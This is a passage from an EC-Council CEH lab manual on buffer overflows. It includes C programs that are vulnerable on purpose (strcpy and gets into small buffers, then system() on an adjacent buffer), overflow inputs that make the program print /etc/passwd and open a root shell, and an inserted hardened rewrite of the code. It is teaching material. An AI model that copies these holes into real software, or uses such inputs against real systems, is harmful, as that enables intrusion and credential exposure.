8/14/2019 CEH v8 Labs Module 18 Buffer Overflow.pdf
1/13
CEH Lab Manual
Buffer Overflow
Module 18
Module 18 - Buffer Overflow
Buffer Overflow Attack
In a buffer overflow, while writing data to a buffer, the buffer's boundary is overrun and adjacent memory is overwritten.
Lab Scenario
Source: http://www.ic.unicamp.br/~stolfi/urna/buffer-oflow
Hackers continuously look for vulnerabilities in software or a computer to break into the system by exploiting these vulnerabilities.
The most common vulnerability often exploited is the buffer overflow attack, where a program failure occurs either in allocating sufficient memory for an input string or in testing whether the length of the string lies within its valid range. A hacker can exploit such a weakness by submitting an extra-long input to the program, designed to overflow its allocated input buffer (temporary storage area) and modify the values of nearby variables, cause the program to jump to unintended places, or even replace the program's instructions by arbitrary code.
If the buffer overflow bugs lie in a network service daemon, the attack can be done by directly feeding the poisonous input string to the daemon. If the bug lies in an ordinary system tool or application, with no direct access, the hacker attaches the poisonous string to a document or an email which, once opened, will launch a passive buffer overflow attack. Such attacks are equivalent to a hacker logging into the system with the same user ID and privileges as the compromised program.
Buffer overflow bugs are especially common in C programs, since that language does not provide built-in array bound checking, and uses a final null byte to mark the end of a string, instead of keeping its length in a separate field. To make things worse, C provides many library functions, such as strcat and getline, which copy strings without any bounds-checking.
As an expert ethical hacker and penetration tester, you must have sound knowledge of when and how buffer overflow occurs. You must understand stack-based and heap-based buffer overflows, perform penetration tests for detecting buffer overflows in programs, and take precautions to prevent programs from buffer overflow attacks.
Lab Objectives
The objective of this lab is to help students to learn and perform buffer overflow attacks to execute passwords.
In this lab, you need to:
Prepare a script to overflow buffer
Run the script against an application
Perform penetration testing for the application
Enumerate a password list
ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review
Ethical Hacking and Countermeasures Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 902
Lab Environment
A computer running with Windows Server 2012 as host machine
A virtual machine running with BackTrack 5 R3
A web browser with Internet access
Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Buffer Overflow
Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.
Lab Tasks
Recommended labs to assist you in buffer overflow:
Enumerating Passwords in Default Password List
o Write a Code
o Compile the Code
o Execute the Code
o Perform Buffer Overflow Attack
o Obtain Command Shell
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
Note: This lab can be demonstrated using the BackTrack Virtual Machine.
TASK 1: Overview
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Buffer Overflow Example
In a buffer overflow, while writing data to a buffer, the buffer's boundary is overrun and adjacent memory is overwritten.
Lab Scenario
In computer security and programming, a buffer overflow, or buffer overrun, vulnerability appears where an application needs to read external information such as a character string, the receiving buffer is relatively small compared to the possible size of the input string, and the application doesn't check the size. The buffer allocated at run-time is placed on a stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overflowing string can alter such information. This also means that an attacker can change the information as he or she wants to. For example, the attacker can inject a series of machine language commands as a string that also leads to the execution of the attack code by changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.
Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows.
As a penetration tester, you should be able to implement protection against stack-smashing attacks. You must be aware of all the defensive measures for buffer overflow attacks. You can prevent buffer overflow attacks by implementing run-time checks, address obfuscation, randomizing the location of functions in libc, analyzing static source code, marking the stack as non-execute, and using type-safe languages such as Java, ML, etc.
Lab Objectives
The objective of this lab is to help students to learn and perform buffer overflow to execute passwords.
In this lab, you need to:
Prepare a script to overflow buffer
Run the script against an application
Perform penetration testing for the application
Enumerate a password list
Lab Environment
A computer running with Windows Server 2012 as host machine
A virtual machine running with BackTrack 5 R3
A web browser with Internet access
Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Buffer Overflow
Buffer overflow takes place when data written to a buffer because of insufficient bounds checking corrupts the data values in memory addresses which are adjacent to the allocated buffer. Most often this occurs when copying strings of characters from one buffer to another.
When the following program is compiled and run, it will assign a block of memory 11 bytes long to hold the attacker string. The strcpy function will copy the string DDDDDDDDDDDDDD into the attacker string, which will exceed the buffer size of 11 bytes, resulting in buffer overflow.
[Figure: memory layout of the 11-byte buffer. Positions 0 to 9 hold A A A A A A A A A A and position 10 holds the terminating \0; after strcpy, the string of D characters and its terminator run past position 10 into adjacent memory.]
Buffer Overflow Example Code

```c
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char Buffer[11] = "AAAAAAAAAA";
    /* 14 bytes plus the terminator are copied into an 11-byte buffer:
     * this is the deliberate overflow the lab demonstrates */
    strcpy(Buffer, "DDDDDDDDDDDDDD");
    printf("%s\n", Buffer);
    return 0;
}
```
This type of vulnerability is prevalent in UNIX and NT-based systems.
Lab Tasks
1. Launch your BackTrack 5 R3 Virtual Machine.
2. For bt login, type root and press Enter. Type the password as toor, and press Enter to log in to the BackTrack virtual machine.
TASK 1: Write a Code
FIGURE 1.1: BackTrack Login
3. Type startx to launch the GUI.
Note: Buffer overflow occurs when a program or process tries to store more data in a buffer.
FIGURE 1.3: BackTrack 5 R3 Desktop
5. Select the BackTrack Applications menu, and then select Accessories > gedit Text Editor.
```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *name;
    char *command;
    name = (char *)malloc(10);
    command = (char *)malloc(128);
    /* addresses printed in decimal, as in the lab output */
    printf("address of name is: %ld\n", (long)name);
    printf("address of command is: %ld\n", (long)command);
    printf("Difference between address is: %ld\n", (long)(command - name));
    printf("Enter your name: ");
    gets(name);          /* unbounded read into a 10-byte allocation: the deliberate overflow */
    printf("Hello %s\n", name);
    system(command);     /* runs whatever now sits in the adjacent command buffer */
    return 0;
}
```
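Added example, not code from the lab manual: hardened counterparts of the two lab programs above, the 11-byte Buffer/strcpy example and the name/command program that calls gets() and system(). The copy reports truncation instead of writing past the array, the line reader drains and rejects any name longer than its allocation, and the command handed to system() is a fixed string that user input can never reach; bounded_copy, read_name and read_name_from_text are names chosen for this example.

```c
/* Added example (not the lab manual's code): hardened counterparts of the two lab programs. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum copy_status { COPY_OK = 0, COPY_TRUNCATED = 1, COPY_REJECTED = 2 };

/* Replacement for the strcpy() in the first lab program: writes at most dst_size-1
 * bytes, always terminates dst and reports truncation instead of overrunning it. */
enum copy_status bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t src_len = strlen(src);
    if (dst_size == 0)
        return COPY_REJECTED;
    if (src_len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return COPY_TRUNCATED;
    }
    memcpy(dst, src, src_len + 1);
    return COPY_OK;
}

/* Replacement for the gets() in the second lab program: reads one line into name
 * (name_size bytes); a longer line is drained and rejected, never written past the end. */
enum copy_status read_name(FILE *in, char *name, size_t name_size)
{
    if (name_size == 0 || fgets(name, (int)name_size, in) == NULL)
        return COPY_REJECTED;
    size_t len = strcspn(name, "\n");
    if (name[len] == '\n') {
        name[len] = '\0';
        return COPY_OK;
    }
    /* No newline in the buffer: line ended exactly at the bound (next is '\n'/EOF) or is too long. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return COPY_OK;
    while ((c = fgetc(in)) != EOF && c != '\n') { }
    name[0] = '\0';
    return COPY_REJECTED;
}

/* Test hook: feeds a constructed string through read_name() by way of tmpfile(). */
enum copy_status read_name_from_text(const char *text, char *name, size_t name_size)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return COPY_REJECTED;
    fputs(text, f);
    rewind(f);
    enum copy_status s = read_name(f, name, name_size);
    fclose(f);
    return s;
}

int main(void)
{
    char buffer[11] = "AAAAAAAAAA";   /* same sizes as the lab code */
    enum copy_status s = bounded_copy(buffer, sizeof buffer, "DDDDDDDDDDDDDD");
    printf("%s (status %d)\n", buffer, s);  /* DDDDDDDDDD (status 1) */
    char name[10];
    const char command[] = "/bin/echo done";  /* fixed string: user input never reaches system() */
    if (read_name(stdin, name, sizeof name) != COPY_OK) {
        fprintf(stderr, "name rejected: at most %zu characters\n", sizeof name - 1);
        return 1;
    }
    printf("Hello %s\n", name);
    return system(command) == 0 ? 0 : 1;
}
```

Feeding the lab's 39-character input to the hardened program produces the rejection message instead of a shell, because the name buffer is never overrun and the command buffer is never influenced by input.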
[Screenshot: terminal output]
root@bt:~# ./buffer
address of name is : 20144144
address of command is : 20144176
Difference between address is : 32
Enter your name:
Note: An executable program on a disk contains a set of binary instructions to be executed by the processor.
FIGURE 1.9: BackTrack Executing Program
11. Type any name in the Input field and press Enter; here, using Jason as an example.
[Screenshot: the same ./buffer output as in Figure 1.9, waiting at the Enter your name: prompt]
Note: Buffer overflows work by manipulating pointers (including stored addresses).
FIGURE 1.10: Input Field
12. Hello Jason should be printed.
[Screenshot: terminal output]
root@bt:~# ./buffer
address of name is : 20144144
address of command is : 20144176
Difference between address is : 32
Enter your name: Jason
Hello Jason
root@bt:~#
FIGURE 1.11: Hello Jason
13. Now, overflow the buffer and execute the listed system commands.
14. Run the program again by typing ./buffer.
15. Type 12345678912345678912345678912345cat /etc/passwd in the Input field.
16. You can view a printout of the password file.
[Screenshot: terminal output]
root@bt:~# ./buffer
address of name is : 17747984
address of command is : 17748016
Difference between address is : 32
Enter your name: 12345678912345678912345678912345cat /etc/passwd
Hello 12345678912345678912345678912345cat /etc/passwd
(the contents of /etc/passwd follow)
FIGURE 1.12: Executing Password
17. Now, obtain a Command Shell.
18. Run the program again (./buffer) and type 12345678912345678912345678912345/bin/sh in the Input field.
TASK 4: Perform Buffer Overflow Attack
Note: Buffer overflow vulnerabilities typically occur in code where a programmer cannot accurately predict buffer overflow behavior.
TASK 5: Obtain Command Shell
[Screenshot: terminal output]
root@bt:~# ./buffer
address of name is : 24616976
address of command is : 24617008
Difference between address is : 32
Enter your name: 12345678912345678912345678912345/bin/sh
Hello 12345678912345678912345678912345/bin/sh
sh-4.1#
sh-4.1#
sh-4.1#
FIGURE 1.13: Executing 12345678912345678912345678912345/bin/sh
19. Type Exit in the Shell Konsole or close the program.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
Note: Code scrutiny (writing secure code) is the best possible solution to buffer overflow attacks.
Tool/Utility        Information Collected/Objectives Achieved
Buffer Overflow     Address of name is: 24616976
                    Address of command is: 24617008
                    Difference between address is: 32
                    Enter your name: 12345678912345678912345678912345/bin/sh
                    Hello 12345678912345678912345678912345/bin/sh
                    sh-4.1#
                    sh-4.1#
                    sh-4.1#
Questions
1. Evaluate various methods to prevent buffer overflow.
2. Analyze how to detect run-time buffer overflow.
3. Evaluate and list the common causes of buffer-overflow errors under .NET language.
Internet Connection Required
[ ] Yes  [x] No
Platform Supported
[x] Classroom  [x] iLabs